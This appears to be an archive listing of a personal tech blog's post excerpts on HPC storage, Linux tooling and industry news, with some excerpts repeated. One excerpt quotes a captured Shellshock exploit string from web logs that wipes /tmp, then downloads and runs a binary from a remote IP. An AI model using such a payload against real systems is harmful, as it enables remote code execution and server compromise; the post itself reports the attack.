The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Category: clusters
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
OpenLDAP + sssd ... the simple guide
Ok. Here’s the problem. Small environment for customers, whom are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio ... Run status group 0 (all jobs): READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Posts
Auto industry? What auto industry?
Here in Detroit, we have the big 3 … Ford, GM, and Chrysler. Well, maybe no longer. This morning the government passed judgment on this industry, which had been requesting capital to survive, as the credit markets, despite protestations to the contrary from various sources, is still frozen … and they (and all other businesses) need capital (and credit) to survive. The government has said (basically) … its Chapter 11 (or 7) for you.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
HPC in the critical path
Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn’t use it, as their time would be spent elsewhere.
Posts
Is a cluster a toaster?
At the excellent Cluster Monkey Doug Eadline mused on a number of topics of interest, specifically on why Cluster HPC is hard. There were some excellent points made. The OSC is working on an initiative to increase access to high performance computing resources for end users. Their effort is in part by making access to HPC hardware easier, and in part by helping people (users and commercial entities) make better use of computational gear.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Category: dadops
Posts
Three years
Its been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. Its an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “Its code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Category: data-use-or-abuse
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22 This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
Posts
Why doesn't linkedin make removing a contact easy?
I don’t get this. Yeah, sure, your contacts are curated, and I don’t accept everyone. I need to see some aspect of a connection and be pretty sure they wont spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible on the phone apps?
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Category: devops
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
That was fun ... no wait ... the other thing ... not fun
Long overdue update of the server this blog runs on. It is no longer running a Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn’t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, have a specific sell by date, and it is often very hard to update to the newer revs.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl bond0: mac 0c:c4:7a:48:69:cb state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth1 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e bond1: mac 00:12:c0:80:26:76 state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth3 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. Its been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldly … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. Its quite refreshing to see this. It will get better over time. Its running in our facility now, and likely we’ll have a few clones in the cloud as well. But thats for later.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Category: diagnostics
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
An article on Rust language for astrophysical simulation
It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things lept out at me during my read. First, the example was fairly simplistic … a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm not quite high enough order to capture all the features of the N-body interaction they were working on.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Category: economics
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though a summary of this is Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A;: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
Violin files for Chapter 11
This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash “array”. The performance is somewhat “meh”, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable’s 4 year old models, never mind the new stuff. Since the IPO, they’ve been on something of a monotonic down-direction in share price.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
A good read on realities behind cloud computing
In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn’t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.
Posts
Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said
I saw this analysis this morning on the Register’s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in “direct” competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
Are the wheels coming off?
From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns … neither one will last very long. Pure Storage IPOed this week and they aren’t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren’t a good company, or don’t have a good product. This is saying that the demand for “unicorn” valuations from the buy side is … well … weak.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)
[Update] As I had wondered, and other suggested to me, this number (25%) was likely a click bait fabrication. Forbes and others also “fell for it.” I’ll admit I did as well. It was too large to ignore, but it also didn’t make sense. Close down mainframe and storage? Seriously? Lets call this what it is, an internet rumor that was busted. Paraphrasing Mark Twain “An internet rumor can travel around the world while the truth is still putting on its shoes”.
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. Its not always right. Its a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
HP to split up
Interesting changes in the corporate M&A; or disaggregation arena. With M&A;, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those whom create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
